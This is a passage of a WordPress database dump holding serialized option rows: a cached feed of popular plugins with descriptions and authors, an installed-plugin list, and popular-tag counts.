Post\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/duplicate-post/#post-2646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Dec 2007 17:40:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2646@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Clone posts and pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Lopo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"753@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"The most downloaded plugin for WordPress (almost 30 million downloads). Use All in One SEO Pack to automatically optimize your site for Search Engines\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2141@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Disable Comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/disable-comments/#post-26907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 May 2011 04:42:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"26907@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"Allows administrators to globally disable comments on their site. Comments can be disabled according to post type. Multisite friendly.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Samir Shah\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WP Multibyte Patch\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wp-multibyte-patch/#post-28395\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 14 Jul 2011 12:22:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"28395@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Multibyte functionality enhancement for the WordPress Japanese package.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"plugin-master\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"50539@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"Displays Google Analytics reports in your WordPress Dashboard. Inserts the latest Google Analytics tracking code in your pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Black Studio TinyMCE Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/plugins/black-studio-tinymce-widget/#post-31973\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Nov 2011 15:06:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"31973@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"The visual editor widget for Wordpress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Marco Chiesi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"UpdraftPlus WordPress Backup Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/updraftplus/#post-38058\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 May 2012 15:14:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"38058@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Backup and restoration made easy. Complete backups; manual or scheduled (backup to S3, Dropbox, Google Drive, Rackspace, FTP, SFTP, email + others).\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Anderson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Clef Two-Factor Authentication\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/wpclef/#post-47509\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 27 Dec 2012 01:25:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"47509@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:139:\"Modern two-factor that people love to use: strong authentication without passwords or tokens; single sign on/off; magical login experience.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Dave Ross\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"21738@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:146:\"Take the guesswork out of WordPress security. iThemes Security offers 30+ ways to lock down WordPress in an easy-to-use WordPress security plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"iThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Duplicator\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/duplicator/#post-26607\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 May 2011 12:15:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"26607@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"Duplicate, clone, backup, move and transfer an entire site from one location to another.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Cory Lamle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Meta Slider\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/ml-slider/#post-49521\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 14 Feb 2013 16:56:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"49521@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Easy to use WordPress Slider plugin. Create responsive slideshows with Nivo Slider, Flex Slider, Coin Slider and Responsive Slides.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Matcha Labs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 24 Jul 2016 18:00:03 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:13:\"last-modified\";s:29:\"Thu, 17 Mar 2011 04:07:30 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20140615032736\";}','no'),(26520,'_transient_timeout_plugin_slugs','1469469603','no'),(26521,'_transient_plugin_slugs','a:8:{i:0;s:19:\"akismet/akismet.php\";i:1;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:2;s:36:\"google-sitemap-generator/sitemap.php\";i:3;s:9:\"hello.php\";i:4;s:19:\"jetpack/jetpack.php\";i:5;s:21:\"podpress/podpress.php\";i:6;s:27:\"wp-super-cache/wp-cache.php\";i:7;s:24:\"wordpress-seo/wp-seo.php\";}','no'),(21466,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1455082362','yes'),(21467,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','a:100:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";s:4:\"5703\";}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"Post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";s:4:\"3563\";}s:6:\"plugin\";a:3:{s:4:\"name\";s:6:\"plugin\";s:4:\"slug\";s:6:\"plugin\";s:5:\"count\";s:4:\"3517\";}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";s:4:\"3018\";}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";s:4:\"2749\";}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";s:4:\"2246\";}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";s:4:\"2172\";}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";s:4:\"2019\";}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";s:4:\"1970\";}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";s:4:\"1955\";}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";s:4:\"1952\";}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";s:4:\"1904\";}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";s:4:\"1805\";}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"Facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";s:4:\"1608\";}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";s:4:\"1521\";}s:9:\"wordpress\";a:3:{s:4:\"name\";s:9:\"wordpress\";s:4:\"slug\";s:9:\"wordpress\";s:5:\"count\";s:4:\"1504\";}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";s:4:\"1477\";}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";s:4:\"1318\";}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";s:4:\"1267\";}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";s:4:\"1256\";}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";s:4:\"